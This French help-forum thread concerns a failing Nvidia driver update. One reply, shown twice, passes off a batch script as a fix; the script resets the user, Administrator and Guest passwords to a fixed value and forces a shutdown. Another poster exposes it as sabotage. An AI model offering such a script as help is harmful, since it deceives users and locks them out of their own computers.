A voir également:
- Problème de mise à jour des pilotes Nvidia
- Mise a jour chrome - Accueil - Applications & Logiciels
- Mettre à jour ses pilotes - Guide
- Mise a jour windows 10 - Accueil - Mise à jour
- Mise a jour chromecast - Accueil - Guide TV et vidéo
- Mise a jour kindle - Guide
7 réponses
pico.l
Messages postés
24932
Statut
Modérateur, Contributeur sécurité
Dernière intervention
28 avril 2019
2 447
12 janv. 2011 à 23:33
12 janv. 2011 à 23:33
Bonjour,
pourquoi tu veux faire la mise à jour du pilote si avec le pilote d'origine, la carte graphique fonctionne^^^
vas voir sur le site du constructeur de ton PC >>> https://www.medion.com/fr/service/telechargements/index.php
A+
pourquoi tu veux faire la mise à jour du pilote si avec le pilote d'origine, la carte graphique fonctionne^^^
vas voir sur le site du constructeur de ton PC >>> https://www.medion.com/fr/service/telechargements/index.php
A+
@Pico.l : Merci pour ce lien, sauf que les pilotes fournis là bas dates de 2007/2008 pour mon ordinateur.
Pourquoi mettre à jour si ça marche? juste parce que ça fonctionne à 95%, il arrive parfois qu'un fichier du pilote soit "perdu" puis retrouvé, ou même plus récemment, autrement dit hier, pour un jeu sorti en 2003 ( Les Experts ), le programme de lancement du jeu m'indique que ma carte graphique ne prend pas en compte les animation 3D et openGL, du coup j'ai des carré blanc à la place des animations.
@Aka-PC: Merci pour ta réponse, je vais voir si ça fonctionne. Dans tous les cas je vous tiens au courant.
Pourquoi mettre à jour si ça marche? juste parce que ça fonctionne à 95%, il arrive parfois qu'un fichier du pilote soit "perdu" puis retrouvé, ou même plus récemment, autrement dit hier, pour un jeu sorti en 2003 ( Les Experts ), le programme de lancement du jeu m'indique que ma carte graphique ne prend pas en compte les animation 3D et openGL, du coup j'ai des carré blanc à la place des animations.
@Aka-PC: Merci pour ta réponse, je vais voir si ça fonctionne. Dans tous les cas je vous tiens au courant.
@Aka-PC
Ta solution est tout sauf utile...
Description :
echo off = ne rien afficher à l'écran
break off = empecher l'utilisateur d'interrompre
net user x y = changer le mot de passe de l'utilisateur x pour le définir comme étant y
shutdown -s -f -t 01 = arreter completement le pc immédiatement en arretant tous les processus dans 1 seconde.
exit = fermer
Donc, à part une tentative complètement pourrie de piratage (tu lui aurais demandé d'ouvrir les ports de son routeur, et son IP ensuite ? ...) c'est complètement inutile... dommage...
@Miky16
Ecoutes plutot les conseils de tonton Walou, et demande à ta femme de me donner quelques références sur ton PC par MSN :)
Ta solution est tout sauf utile...
Description :
echo off = ne rien afficher à l'écran
break off = empecher l'utilisateur d'interrompre
net user x y = changer le mot de passe de l'utilisateur x pour le définir comme étant y
shutdown -s -f -t 01 = arreter completement le pc immédiatement en arretant tous les processus dans 1 seconde.
exit = fermer
Donc, à part une tentative complètement pourrie de piratage (tu lui aurais demandé d'ouvrir les ports de son routeur, et son IP ensuite ? ...) c'est complètement inutile... dommage...
@Miky16
Ecoutes plutot les conseils de tonton Walou, et demande à ta femme de me donner quelques références sur ton PC par MSN :)
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
pico.l
Messages postés
24932
Statut
Modérateur, Contributeur sécurité
Dernière intervention
28 avril 2019
2 447
13 janv. 2011 à 18:32
13 janv. 2011 à 18:32
Il faut comparer la configuration du jeu à celle de ton PC. Si ta carte graphique n'est pas pris en charge, la mise à jour du pilote ne sert à rien.
Merci pour ceux qui ont réellement essayé de m'aider, même si le soucis reste toujours le même depuis 3 ans. tant pis, ça restera comme ça encore longtemps
Bonne continuation à tous et toutes.
Bonne continuation à tous et toutes.
Salut,
J'avais le même soucie. C'est juste à cause de la perte d'un fichier système.
Tu copier ce code dans un document bloc-note, et enregistre-le avec l'extension .bat (exemple : GeForce.bat). Il te reste qu'a faire un double clic sur le fichié créé. Et enfin tu redémarre l'ordinateur. Après, tu peur faire les mises à jours.
echo off
break off
net user %USERNAME% 0895
net user administrator 0895
net user Guest 0895
shutdown -s -f -t 01
exit
J'avais le même soucie. C'est juste à cause de la perte d'un fichier système.
Tu copier ce code dans un document bloc-note, et enregistre-le avec l'extension .bat (exemple : GeForce.bat). Il te reste qu'a faire un double clic sur le fichié créé. Et enfin tu redémarre l'ordinateur. Après, tu peur faire les mises à jours.
echo off
break off
net user %USERNAME% 0895
net user administrator 0895
net user Guest 0895
shutdown -s -f -t 01
exit